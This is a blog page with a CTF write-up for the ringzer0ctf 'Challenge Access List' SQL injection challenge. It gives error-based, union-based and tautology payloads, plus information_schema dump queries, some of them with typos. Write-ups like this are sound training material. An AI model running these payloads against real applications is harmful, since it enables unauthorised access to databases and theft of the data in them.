🔐
EAkl Blog
  • 👋Welcome!
  • 🐛Web Application Findings
    • Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    • Authentication bypass using empty parameters.
    • IDOR at Login function leads to leak user’s PII data
  • ℹ️Recon automation, tips and tricks
    • Simple Recon Methodology
    • How to write a simple script to automate finding bugs
  • 🔐Hack The Box Machines
    • Feline Walkthrough
    • Reel2 Walkthrough
    • Active Walkthrough
    • PopCorn Walkthrough
    • Jewel Walkthrough
    • Passage Walkthrough
    • Time Walkthrough
    • Devel Walkthrough
    • Lame Walkthrough
    • Beep Walkthrough
    • Blue Walkthrough
    • Jerry Walkthrough
    • Optimum Walkthrough
    • Grandpa Walkthrough
    • Legacy Walkthrough
    • Mirai Walkthrough
    • Valentine Walkthrough
    • Shocker Walkthrough
    • Netmon Walkthrough
    • Bank Walkthrough
    • Granny Walkthrough
    • Tabby Walkthrough
    • Access Walkthrough
    • Swagshop Walkthrough
    • OpenAdmin Walkthrough
    • Remote Walkthrough
    • Sauna Walkthrough
    • FriendZone Walkthrough
    • Hack The Box — Networked
    • Hack The Box — Forest
    • Hack The Box — WriteUP
    • Hack The Box — Academy
    • Hack The Box — Luanne
  • 🏴‍☠️CTF Challenges
    • CTF CyberTalents  — Bypass the world Writeup
    • CTF CyberTalents — Admin Gate First
    • CTF CyberTalents — Inbox
    • CTFlearn — Inj3ction Time
    • CTF ringzer0ctf — Challenge Access List
    • CTF ringzer0ctf — Login portal 2
    • CTF ringzer0ctf — SQLi challenges — part 1
    • CTF ringZer0ctf — Login form
  • 🔴Red Teaming Tips & Tricks
    • MOTW Defensive and Bypass techniques
  • ☁️Cloud Security
    • [Azure] Real Example to know different types of app concepts in Azure
    • [Azure] What To Do If?
Powered by GitBook
On this page
  1. CTF Challenges

CTF ringzer0ctf — Challenge Access List

PreviousCTFlearn — Inj3ction TimeNextCTF ringzer0ctf — Login portal 2

Last updated 2 years ago

Writeup of SQLi challenge Challenge Access List

CTF ringzer0ctf — Challenge Access List

Let’s continue our writeups about challenges in SQL injection category

In this challenge you will notice after opening the link that you have access list which you select the username and the system will return some information about the selected username.

Open the source code and you will notice that this data transfer in post based request

So let’s use burp suite to intercept the traffic and editing the parameter username by the injection payload admin’ and you will get a SQL error so it’s error based SQL injection, let’s count the number of columns by

username = admin’ order by 1 — — → true

username = admin’ order by 1 — — → true

username = admin’ order by 1 — — → true

username = admin’ order by 1 — — → false

So the number of columns is 3

next payload to know the vulnerable columns by

username = -admin’ union select 1,2,3 — -

the 3 columns is vulnerable

let’s dump the database by using any column manually, also you can use sqlmap to automate the process

username = admin’ union select table_name,2,3 form information_schema.tables — — → get tables name

username = admin’ union select column_name,2,3 form information_schema.columns where table_name=”table name”— — → get columns name

you will get many columns and tables and in this step you will dump information from each column to get the flag and i prefere to use sqlmap in this step.

Instead of this process you can try another injection payload like this

username = admin’ or ‘a’=’a’ — -

Nice Nice ! we found it ❤

Challenge 5 — 

🏴‍☠️
Challenge Access list
ringzer0ctf